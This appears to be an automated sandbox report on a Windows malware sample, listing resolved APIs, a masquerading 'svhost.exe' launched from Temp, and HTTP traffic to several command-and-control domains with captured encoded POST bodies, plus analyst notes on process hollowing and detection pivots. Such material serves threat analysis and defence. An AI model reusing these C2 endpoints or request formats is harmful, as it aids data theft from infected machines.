kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW kernel32.dll.InitializeCriticalSectionAndSpinCount kernel32.dll.IsProcessorFeaturePresent msvcrt.dll._set_error_mode msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z kernel32.dll.FindActCtxSectionStringW kernel32.dll.GetSystemWindowsDirectoryW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap mscorwks.dll._CorExeMain mscorwks.dll.GetCLRFunction advapi32.dll.RegisterTraceGuidsW advapi32.dll.UnregisterTraceGuids advapi32.dll.GetTraceLoggerHandle advapi32.dll.GetTraceEnableLevel advapi32.dll.GetTraceEnableFlags advapi32.dll.TraceEvent mscoree.dll.IEE mscoreei.dll.IEE mscorwks.dll.IEE 
mscoree.dll.GetStartupFlags mscoreei.dll.GetStartupFlags mscoree.dll.GetHostConfigurationFile mscoreei.dll.GetHostConfigurationFile mscoreei.dll.GetCORVersion mscoree.dll.GetCORSystemDirectory mscoreei.dll.GetCORSystemDirectory_RetAddr mscoreei.dll.CreateConfigStream ntdll.dll.RtlUnwind kernel32.dll.IsWow64Process advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddVectoredContinueHandler kernel32.dll.RemoveVectoredContinueHandler advapi32.dll.ConvertSidToStringSidW shell32.dll.SHGetFolderPathW kernel32.dll.GetWriteWatch kernel32.dll.ResetWriteWatch kernel32.dll.CreateMemoryResourceNotification kernel32.dll.QueryMemoryResourceNotification ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 uxtheme.dll.ThemeInitApiHook user32.dll.IsProcessDPIAware kernel32.dll.QueryActCtxW ole32.dll.CoGetContextToken advapi32.dll.CryptAcquireContextA advapi32.dll.CryptReleaseContext advapi32.dll.CryptCreateHash advapi32.dll.CryptDestroyHash advapi32.dll.CryptHashData advapi32.dll.CryptGetHashParam advapi32.dll.CryptImportKey advapi32.dll.CryptExportKey advapi32.dll.CryptGenKey advapi32.dll.CryptGetKeyParam advapi32.dll.CryptDestroyKey advapi32.dll.CryptVerifySignatureA advapi32.dll.CryptSignHashA advapi32.dll.CryptGetProvParam advapi32.dll.CryptGetUserKey advapi32.dll.CryptEnumProvidersA cryptsp.dll.CryptAcquireContextA cryptsp.dll.CryptImportKey cryptsp.dll.CryptExportKey cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash cryptsp.dll.CryptDestroyKey kernel32.dll.GetFullPathNameW kernel32.dll.GetVersionExW mscorjit.dll.getJit kernel32.dll.GetCurrentProcess kernel32.dll.GetCurrentThread kernel32.dll.DuplicateHandle kernel32.dll.GetCurrentThreadId ole32.dll.OleInitialize kernel32.dll.lstrlen kernel32.dll.lstrlenW ole32.dll.CoRegisterMessageFilter kernel32.dll.CloseHandle 
kernel32.dll.GetCurrentProcessId advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges kernel32.dll.OpenProcess kernel32.dll.GetExitCodeProcess kernel32.dll.SetProcessWorkingSetSize kernel32.dll.GetUserDefaultUILanguage bcrypt.dll.BCryptGetFipsAlgorithmMode cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom kernel32.dll.GetEnvironmentVariableW kernel32.dll.SetErrorMode kernel32.dll.GetFileAttributesExW mscoreei.dll.LoadLibraryShim culture.dll.ConvertLangIdToCultureName ntdll.dll.NtQuerySystemInformation cryptsp.dll.CryptGetProvParam cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt cryptsp.dll.CryptEncrypt cryptsp.dll.CryptReleaseContext kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.DeleteFileW kernel32.dll.CopyFileW psapi.dll.EnumProcessModules psapi.dll.GetModuleInformation psapi.dll.GetModuleBaseNameW psapi.dll.GetModuleFileNameExW kernel32.dll.GetProcAddress kernel32.dll.CreateProcessA kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory kernel32.dll.GetThreadContext ntdll.dll.NtSetContextThread ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx ntdll.dll.NtResumeThread kernel32.dll.SwitchToThread psapi.dll.EnumProcesses kernel32.dll.GlobalMemoryStatusEx ole32.dll.CoWaitForMultipleHandles sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx advapi32.dll.EventUnregister
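Execute Commands
"C:\Users\Seven01\AppData\Local\Temp\svhost.exe"
Note: the image name is `svhost.exe`, one letter off the legitimate Windows `svchost.exe`, and it is launched from the user's Temp directory rather than `%SystemRoot%\System32`. The Resolved APIs list above also contains CreateProcessA, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, NtSetContextThread and NtResumeThread, a set commonly associated with process hollowing. Resolution alone does not show that the calls were made, so confirm against the API call trace before drawing that conclusion.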
Started Services
Nothing to display
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration (seconds) |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-07-09 23:04:14 | 2018-07-09 23:07:06 | 172 |
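16 HTTP Request(s) detected
Note: the first four requests below all target the path `/wo/` and carry the parameter `_ZLL96`. The GET requests send no User-Agent header, while the POST requests present an MSIE 8.0 User-Agent and an `application/x-www-form-urlencoded` body made of a long encoded `_ZLL96` value (Content-Length 2200 and 57160). These traits can serve as network-detection pivots alongside the hostnames and IP addresses listed.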
hXXp://www.plodameg.com/wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj
- Hostname: www.plodameg.com
- IP Address: 199.192.20.201
- Port: 80
- Count: 1
GET /wo/?_ZLL96=GcXdlIa6ZxlqRbZegdKsNXkvbBeiEnvqHFxsuUIxgQvlLphwtCbkHoPUJWL31ZKs2L7IxmKC&GzuD=WBjTZrcXj HTTP/1.1
Host: www.plodameg.com
Connection: close
hXXp://www.alexander-international.com/wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
GET /wo/?_ZLL96=P1GwTOxNZA38J/ty9S5FskuZ18tjN2dwSBOS9pFPubeNqfHReGsJZQWznW45HPxeFtCDSRf0&GzuD=WBjTZrcXj HTTP/1.1
Host: www.alexander-international.com
Connection: close
hXXp://www.alexander-international.com/wo/
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.alexander-international.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.alexander-international.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.alexander-international.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=HXKKNrI4AHn5IaIH~0gFxTeF9900MCBGAUzA(JFKipOqk83mXjIlN0K9o2saTfFZEIqJcW~M~-g5Ol9eDc3svba05tZLFxhOj3NjT17jVyAx0pj4qoqyzqq3f_3je5n_IfSyi-ZOXNB_kKEbDqxGpr~azkRcut0M(mzlE-ojIMiwTH7oTlVan4gt5_mDxTyciQ2aUWBcvEjZ7RW55b7oPYSSKzmCr974cQ4HbQB0RNMmmcsaheivoxD4m3B06fC7iFBtUjuiRZgBKhkXBu~a~hrP86MXtzeQIrI15vRm8WcSwz6lWGLQbI3BI5crFWezCSDXj4WduMKNYglsbjAGHQ~VBBaPmj3_QZnIGICCoPCITaH7g1lRneg5lUTB6c9-Cpmy6xl5zMS39s(DWPl1waUzDS5PQ2VDjii4CsJCnfJRbE2Qj-V69fJzcoJ2BZ99gVO7A5SltSJtO-YUh9bQDFAl(ekFs81fm8DF(h2w6ZZzNuBX2rvfZaN563k53R5WyOHMZEp-bX02fCkOfND_yvSvOnQpX0sN(6yY3_lfny~4lo9MYSnX(jD8Q9ccoy(IyyKdaYIyJnEkiPkBQ2JojVN4q95rLIyTvCGEH_HLEdlCC0MfssqyXTTXFBICxGYHjTv-TkWDVuDyNm8cBPR9PFlEZeiiZzrcJMqpsWBIq4iY0ZTVGrkRGq(7YL8q9g2m3KUSpyHDInVmE7dT4jotjUa6CAvaUi2BwGheSGBAElvsy5(4fLBzvgmE34SAFc9qbLkIGZSSsvRhP9ncYH(IsBEdbsURhaT9MFArA3d_xgWeZjm3B3AqPuLH66UYmCYn5KUxsIQFrhQUJy0WuORbmaNf3A(r8j51MostjP10hokT7oWEnC1ovL5rmubl6Rsh5hT7F37xJ4SqzbBeo8Jxc9(flD(alExFdkEGX529pkiQSDHJDJURuo~_OuCt60e7IEy_91i6YBcsSRl_qGf-LolNWRTcZrvR95E91-zytlFiu-JxYg061lRgSmEgLNmVf3ip4PS5lHjRJiiMSpdfKzVvFgPX6nT8XqYiyz20hO9BohU1k5ykggAim8PzIPBi7x5yVKGZXbFEc552yjGQuWAAG8sRHelVXy0T8bXzK9BPKhqm09WCKQwo6hYfKVMkVxskIXnEayRQJldtghRNoRXt6xqMBKOY0n389Azjc0rTbBn2StdDPkrBi_hVBbYK(uRGD-P77y0FzPSWskLvqNrsUj0EQ8s1KBkEtVBKD3PIBJc4qYcRfL~cGCY4aOCh5GvTZpC6Qn9XE8kxxB4P8RB1EtB0LbYAj5gpUR(cSigPGZm7J59vdNnTo6vdmQtAxdwu0vRifWMXeDy11bkG8D5kVdOFthltXMmgwC91EbhBUH94cWtDGdySukaSoEMAXqLlEiprXSpHtkUH8qVeKDvuHYWb1hm38eeDvFL1hnFK8j5biEfKDesR
D82nzNmDEtYZp7a9FC37LAbejr1wcK8SwCV8Z5JAB5GBDVcNfe4iBWoRXl4-Q3ti(DF6rfSkfa7rFeoPvbJmt-YSiJiPWybqL_ztI-xT2D139iNukKQAiDm-bBnr~tLiH10EWF0dCQYqi7NFlmB-qjBV6fuKgbseysgcNLPvk8izj3Lzz3Pkxdnn9GrUwUGajujJmYb9mkI4LwwxlTAe5hP7kBZZjU(20wggiZLNnf62uJ~LYBJvRipd8F~MbI1krQb3~LUldTaebIATdobx88jMmHzJ2re8kduldcocOkZ8SfmBdLp9Ur9Yeu5t1d3zQAjN6gUanEEp5btbvqG6Xoxi0Sc3L8CovJ(RQdJrCqzQfOOO7nwdGcI_5N8ZnOm7yPrIUXanwsad~x85BZa-W6jQGZKZ0Udw(RngrQ1Hg03fZXxe9OQ9P4bg8po4pygla-Uu3vhd7SuP05~pWHnO4v~1HTvjGDn-LJqiyIeZl2sp2p66w4UU6q3boQ(yyt4g9K1hjaWl7HOQ2Dv2IBTr9gMYRSdEnll6Iv2ImbekKNS1~KR_k59J6fiV7uNz6iqMeC1OT4RPSrvHeS8Dq5jiGs2OUcjog97VIw6qO-54uOBpzY9HW6hMwZTbxAMsIKnVtWQTZPviwO7M0UPjrQqsBd(-eheg2lFWfX9s~HVXEqrkZFzYiafcbgU6N5oh5J4EGBI_BsF3oG2Dwn4v8mzn\x00\x00\x00\x00\x00\x00\x00\x00
http://www.alexander-international.com/wo/
- Hostname: www.alexander-international.com
- IP Address: 52.5.142.190
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.alexander-international.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.alexander-international.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.alexander-international.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=HXKKNoZLF3roZIh_61xYsjuRytw-PVt5DH76(I1O5Ye4jcHmfBgmKUK88GsZY_4waOKBcXKi~-o6X3FbB-f3sLGmm9NSUElBjVxJYUDjISEz6b7jm9Cu7uCxLtGjF6fOHd~2rblmTPR0oItyCMsHtbro4FEVuOR74iugIdYKCsGABAPeTn5n9NpR3cX1yh7rmXuaXlRqkn7XnCf8~ICab8XGJyWFlMb7fSgXVRF5XMEy(7omj-mmzAzFrUht6P(6lDRTZjyRcLsNBQFoANSo(QblktwX6y~sLpQu0vQA~WEVrD6ZWGPYa_G4UpctagvvHyaCpYGNu5WNaC9_MxoDIw(LIxqDhU(2QZ2SH4KCpNmIFOb0i1lRp-g_lUTZ6c9XCrGIoh95j8ux8ajzHs5By6UJET5jU1gqjjqgCMVCkuteNxeUpLospqJaPIwoBZB4hUeRXIu4sSJqFv0Ll42JHVw6nZA2hsh1mf(w4BO89u5ZU-VpmpDTavpo~0hk5EA1zuCxM1EXdRQ8e0hZPcXr7O(bBFE_Hlcyu77I3vRL(AGWrohbPwCMpxiwWLsatTvN3BLVPZwNMnJ6oaMQQV1Wy20LodVWEqzA63yoNP(qA84QLnsXkYTkT2OueXJ1wkEf2CfwOyL1E8LDDQ0-NLJBCm9kbOu6azjpXYvHmX998val4szNcLY1Q4HweYF7~CGCssstlwHCO2RpJvBv9Q0WkkyLLzXCICHbwFBaS2FAFlDsk-L5co5w0gnP7oScd8xYbJkUcZWStfBjJMnGcViyyxFSXNYClazUMHtiB3ICnTGZITGzA3AtAsu7rKYriGlC56AhmdQs6T4EPhMfkLxAibt12gy3lhdCY5Av9o4xqJch0raUrm9ggox6vPDEwgZj6U33X0WMdrKjq-N4odRPZNz8qkLFlWoQX0cnWZCHn2XMZjqeRpgJ(NS4OcCH7Ru3BXLvkBqsRRonTTQEuFjmHa0dWxX6QJfazqM30Jm2uzU0pbldREkB7AdSTCgaNpreAF(a0dbH2mnwOxT_Z6RCLAUEHQKj9iCdZ91M0EKVytQxuT4jrMKcjDgQgqfeGOYnzhZ7AMaUS_h1dpdGmyjNl19iVc1VRZ5lXwMl8-(zLtJPYCim8cL0VEhn9S8jU1QpS30mJ1PbJQpNY1ROojA-uDTXrR~RYd~F13~B1TSbc2LTbiTJXMliIlmbhch3BK5Ko7JSa6ibjzEb1I~tpiidh727W39sSt88FBJ5uTtjDjezCtYtpb0mSbK0TBIPYOXhxGP7T5m3IEFLMvpb1zkHnA4ePqxlXp0InNkuMXysERQ8O6SMZ959fdaDqKOT(SBe1qAJh-loXCkTQAvssqci4l5RcPb_swJXd9yHwn5kDO53YUAgeDY5G_SD8FmGp1BaQfz2OBpWfxkEi1gK9K9xSHP2bufe6li21-TU5hLjgwwd3VhokDKbO-s
ia8uzmfGDEuoFj_ykXj7xLUvnktBRaLUThxNUUYVgJZ6wVHZgTeQ2LR90UVgcZV1y7ABE9-WnabuMDsJRvrozmPkSvYCuOjLSKeasWeBth0VB6jt2kJ0HsCefPhToxtOiF1VTA1BnJwQhvqFT9H5ml1FVyNKO1oI0s70WMMTr~vWonEnZzHSzg_jB4Qbm~FyU0dzZi6j4il8AYg8TrUIZ8y2suBdItVvU2Ahkn5(smv2CuLv3UyxoRjBew0W5Y6l6~EeB(JsHXU2icpgfGuf61eL1vnDMypyMhfbpd4suDjJAUYG6ea5VQ8piV9QzxvziQ1eCrD0eqXhfvv5MiN3NRLlh3Qkgctuv(rORR_FVHrb_I_PrnhdbApMN6IMct-Kxs9aecH2o9-KV0Tk-DtC-UZ7XWJGLzwZmhFPf0R1jkFbpRU5t8vRvGoCi8qYE8SgbZc0A495owxqBuN3ld26c7p6zPD3jJATIP4zE1LS6xBQ1(pyzxboJ25XZnH~_29E196NMmaqazheRywjoNRvy1jwKDn1VpkdeKKOgmZf4Bv2YvKtAor9k5t~f6_BK4Fr1Z1ZcM5NzfKLcfBgnp43TbdGzEMXnkqvlIjiMEtwlvvt3~6ciY5lVsamz4kIsc47M6WsGU6jqhMes5GSb2iO_WsrSZRzwoFgKQ0NO8HZ1QJ(zbn7ToYXaZDM0QNgV4aFhBUcDBrNmhHuL0g8DtD6y0-67M8HYlVhPkfHT1Thb(ARvLLkKvimsIvl4GquTXe35~aaHSVPRta8kt3btYeQpczS5Nf(lmuDPluIvL4PLYgr_QdQiwhZ68-(i3dSpFsh8Y9zVMvL718HqrVKnz1znPh~9zCbNKwSMgAK9D8lz~Iy8ECdZ7QHugYa8VMAl5DUvPn0INatMi
http://www.ipducks.com/wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
GET /wo/?_ZLL96=BmONLxxZHLtt6vXOLyHcOkXnIvM0pG6jXWO82HH9Q91vB3kvQ1F/r100Oe9lPOEOlw/K7kba&GzuD=WBjTZrcXj HTTP/1.1
Host: www.ipducks.com
Connection: close
\x00\x00\x00\x00\x00\x00\x00
http://www.ipducks.com/wo/
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.ipducks.com Connection: close Content-Length: 2200 Cache-Control: no-cache Origin: http://www.ipducks.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ipducks.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=JEC3VXI9YLVKnqz4M3TLZE3RMtMSiVK0PDzP6n68FuxmRmoNbh1T4wdZAZdiOIItxy(r3DDUe4Ujpj0F57MKxsJSSgy0srVtO_HjXKxziCI9fEcOciAt4Xcankvd(EXq(alNuBWpA2IGyYcE~ju9g7CJzcQ4eut1NZ9s2agXOqds6SmcLNCzp7jDJ57j2za5fY0ZG_DATOpPVNY4jEMgP76oVe9QMI0eHJmFi7HLI7~7XK2jcofj2uijjDYnfYtfM0VKOd~4Taji88kVQa9UjDJmgnjjDVs1khcy8TBhPHYCwxGvzQfmpx(CjwZY3u0JW8kBbfNIvaefRRSCcneMa6LKNKo_bH3wvsIWYjXQK3rsHgNiyLkisxGSUNx7plXS54xKX3uZlf8rEYlORHr5juSgug1hQ0Fls4hYJtba0_Z_jKXJfVtONWa8D-bIYVlgNRIyawHLv4OY7A9r1XQ-T66yA15W2Zpu4JS-lE6YNSxpT-p_~3bTIcJSMBbo4VsodyinC8UTkOiqjCYx9crlXp6bkvu7YOAoHd3Cdd9aaA~wg9w0Bt7dUXfUAhAPPWCFQfxF9LptSBsBSnGqjvyhvojZrd(VzFYY34adlknpQnx6B_N-qggYvzscjxhYK-a1utYc(S9_I2eb6TVNlVltk4adI1p533ZTX3(iO0oWhga7CJ(K7jEdOdtgwLcB10ryv05l0UoCE8uUdyNTE7pGPg9mrXRiKQ15VVpOidnQP92digOX~R1ZxI5J84VbJO2wB-zYMxClfR7pTqbDx9zeo1fxG0ZbQh~Lym(ROQPxLRFx~2PnzsLSWVXCWFx1AH6OzdV0xze_YA~KoAjcnjzMtsqeKTIK~vlq03DCnoz-(L1dzw1ARckNLqa5J_oPLEekBqvPxkEiSmAlAwz0aDVsZQSlNEOkD3Y5l7bLMfKdiADRusuEaLL8PMshsD6v(DmKfY8Yml7pQ32PoDsL8G5iwTHpJ_oTV5ILgqojM9nfT09fUWJszN~tk9l6mZaijKnSusaibJ7xiTcypE1gIEv2uXBUgTpXqyLiKZE4Uy82mD6_Gp3hA-pBDKBDb5wqW6ORpWAfUz5tKWpxzLWwiecg(QAYui01kEaMzfnIceDD9OqBjeEu~C614TT6jte1~ozQORGEl29aBQKYx95EcfBk0sNHMsHiBGjSviMJGCENBkSHx-zO88Jda7RUw2lDU_EiHDleGNuUXfTuR9aXBMctQB52dpzoAR4dCtXuov8BAw(GGy3M5yNcjtcnV0ss3Px5AIwXRbk5rIHctwksynF5NKb57e(XTS~TuVLSksoYhBSmpym6dkABybWz2u6qzZJuJfr0trRndGvz4MeCY43Iee46XOX1TYAOehtVjSxTt2jQBAA3CdOObDfEw-rroaTs7j9_KjW_rGcPUb4T1xA-fS8vT7dt(dWIa7tC1UVEp08YBDVDhYOq2d~LB5rRArdQM0a57Cbl8AleeG6wesxFI1L_Kju1fjkKvqV15EF6
BFY5APD2OZtAic78xsoDxwxNFJNN5kEt4Nvl0gju4-cCwI9EqamVm8N0axwHwa1Yk3QYWuzkKKMQQxlbQKAZx5fEFP5R3I8iLjbc2Enj3-MFIX3JRfs0VhBaqn0FLBSEvm2F~hNj4dasGmmeBgxJOM1Plsc9DXSnvVIhbLLAKK0FfGKJYP9-~c54jqKUARLtBB3mXp2HG74FjQ7L2d(T5SXl1o20TvaIGfsDfS4ih5mamRvV~wLazCrvb-7ck4Za1Wo5SN7WO9Et0KbwI0bUk4YU~jDGTEsZ6P04ISa9a_tGvDSBqiPlq-B_NBXT3eiFL6o8~rLTWckHahogPYAx3Up1HlZqX0iyFTlE7YniuDxiEUJW50bZ15iLSr0oGjIO5uvDIv6LDen016qAIWG03jy3zY8Bnxv1898Xq0mPlfxcWfy_BwrIQjMLRVREC_a110MdE0p8kWLg82WIPeRxNqXARffsih1AmD4adxcrB2MalLdF5v7z7fWBUegsiDaVaLYkahjhww9n5uuqdV40utsviwF9Vy0shw~0tpeb0dVdy94bkTycUqt3~GIHDC~bKea3Rhla1PhjxAgUO9vlGu6cixLpm8L9YMmfl6C-uel9ubKgCnA7n9S0cynoakks3L6QpM~X8-EPbTs2qTgMsd5l00D9mkhKW0tm\x00HVXEqrk
http://www.ipducks.com/wo/
- Hostname: www.ipducks.com
- IP Address:
- Port: 80
- Count: 1
POST /wo/ HTTP/1.1 Host: www.ipducks.com Connection: close Content-Length: 57160 Cache-Control: no-cache Origin: http://www.ipducks.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.ipducks.com/wo/ Accept-Language: en-US Accept-Encoding: gzip, deflate _ZLL96=JEC3VWQDZ7RhjobXI16GdknGE9Ic5imhVQ7i6kiwRfh4GTgNQDdQ(QdWEpdhf4M_ygvz3CG_e5sgxWoAx4lcsMVEeDO975tyOd7BSIRzny8sCCgRbQkpnnQYpB7Ymk2M9_dJ(DP8KXANw9o4sVy5qrGK4_s-eN5bKY8v9-IENvt2(A~ULOPHgbz2CYzY1ADCOIAZEOrQbuIJLd5rkT5QNKrGd-NpJYUZANGV65reK_Cnf8HaRoT0puyeuiQIYJB8JyF4TtjORsjuzOtsU9dcjz5A6WrjLmkzpC195zBaJHwO~RG5zRqr4TjgmwZa6LsaSc8JCO8NvrOfQ0XIel25DKLvPaYofwfrvt4CKDPQLxDsNkplwLki5BGQUNxjplX_56QLW3mZjfQtFr9-UV2KsuS8viMlU3Bes_tQJJra3P94oPzNVktNZHv7KeTDYVYgMQYIeR7Wu4OHvEVB4zFvHaqhfnZtl5tU4pG1ljXMMTt9V-sKrT(fdpMtdRHwyEBQPCG3AdZ6zYukixwV8-HxJ6~N8_SXOewXWfaLcMIBPyWku990WLyER2X4UjMeFXSEHdANxYpoRBoeWXnSjMOLo6Kk7tS6xBZ994jihEO_VAwcIt9cmRcrqW5vs3hsevuw35ca8wFyCxrJ(CN_oRgM5PG9Z1dL03gzY2bBKSIzwSWCZrTSyT42K9MLx4lo3RvWwEBRqX41CtbmQmFrIp1tYnRDmkpqKnJAVVh4ltTQM5OdmjWQwX9e744ChoVHUerlB8DMehWlZiTrSrbZ1tGklVe8ExxfUgeyylPePRyMBxhu53v70sKYXw(5QF98dT(hzu4vk2(geDGauT7Zj2bLpvy4FTEYrupd~V3EiYDur6tB8wh6CNs7PtGSGbEqPQGUHa(T10wfZHwYKmuRbitabT35CmX8DhMVhLT-P-vK5C2MkI6uIrX0epMit2G7wAzLXOkHtEfFbniqrCAnrVFLzBHSJfs5X4MW7pQTNLvIUlo9X0Z6s4OGqfEV0sCIluzQj-GeZKj0nAgHuStcCSDK61BZsjl2kTvCEOwiXCUpgErPH7brca1tBrJhSMoXe-DKmANVP1t0J3xL15qi8_oI0zQpo3I-1XC4ze3qc-nDpeiBhOku0nyI8ni9kf7Q3Z2QLTCakTpBACyA6Z9RXdRqx-JpfoHrPhDbj0VpOVp3BimHxfu05fNBUfBD42tHVvl6NRAEKdq5dNLOX63Hfbg4b3FiaZfTDhoAf83K9ppzHkm7JzvV3QVr69J-ZlUA1PleJKpIFY4-yPiH4Sou2UY2HPvP0ZWffUGbomKbrv4rqGPPhUudNBcX6brh0eah5PZONoSd2eZpFETJ8cqWQansSc9KZurVbqF1QUtyiwhCunufIXJhOvf0Cinj0uKitrP9(S5sOWTvw34TK78IzRZkKzQRW9N13cGJUbh-kWxWsn8mERNfgPqU1d~WLpzFLtJQM0i92Cmh9zxAe36jOOB4dg(-GCOZcnkqkLxu~mA
RCmYtJMqjHJ1I3JHs1slS1FdKTrxr8Xk8qeWCsgvu6P998sZgq7OJrs9WODwTgp9Qk10bWO6mQq5YMhwBWIY3nJ7XXfhUoMosTHH603PjwLUBTgnjSdoIUipWzUcWOy(ruWqRpEE8xc7DakKULjxnEONKvMYJQnfwiXU9XNXDOqJDKUinLP8jyf03ldCKAQjmP2avXsCAZqgeihTJvPGp~VXtxLGUSO7BPMsQQwBY1Ni57TC0ySPSzj7NZtvsi4lhn3ZmVeb4Q_cwnpeOIFSGjMoQ20zzXFMOpcoGQAO4b9VVhjOaszn8rctFMB(75firBuI5upWoVZcKQVImP5Zd8AZuBRxiSzm1IGVE97vltj9KDw0d61297sWBWapTOj49(LaycOCCDe(-~qqIJ12giRbF8-klqQ7P18xxr2ONsP5cMJyjKk(pA00wZ00GAfyv1XwmQGp-rBLys2TSMu5QIqbVZ9zXtD4DpxsfUxI5Az0b2q1h(KXb7ePHa4h6mymQWfUzYz(rxk9C7PqeLTsIysxWtV0bUiAAg0mBjIu5kNRa2tgOkDDJCegs9nkFKhf0EdeiQyRt8v5j5D87Z-qRcPCEojuXlN~ectqui8DbkOodqvKnNExCh66GIwD_aBgd8LaN7_WRjPsxBiJ2tVMkjLNFpmWX0wxGWDwcKcsW6wvvL-QtNM7VvzhT2ex068lZc-jftVM4ykVEb7lxk3EDiq8Aev5es-8T46OicZ~A~qkRy1yNtFWk4xqwXwzzVbukBsCh~I~_3DpXL93EiPHkI5t8lNMZ1gbNJ12YE4GvutrmauPe3dAmT7plF9pq3QYgZebf7g~YbOVWGD4r8AS4h7991Xj2h72uCAH6R9zDskhdMTs5qzLYVtv2B05fXY50Rt(8GfrsN
http://www.employeevita.com/wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj
- Hostname: www.employeevita.com
- IP Address: 52.72.89.116
- Port: 80
- Count: 1
GET /wo/?_ZLL96=9i209dyIyU9F20iTxpg1zH/IiUX0PjkcVL2t2gvEXPLkT8PW7wISloIb9cUcaBh89qBzU09+&GzuD=WBjTZrcXj HTTP/1.1
Host: www.employeevita.com
Connection: close
\x00\x00\x00\x00\x00\x00\x00
http://www.employeevita.com/wo/
- Hostname: www.employeevita.com
- IP Address: 52.72.89.116
- Port: 80
- Count: 1
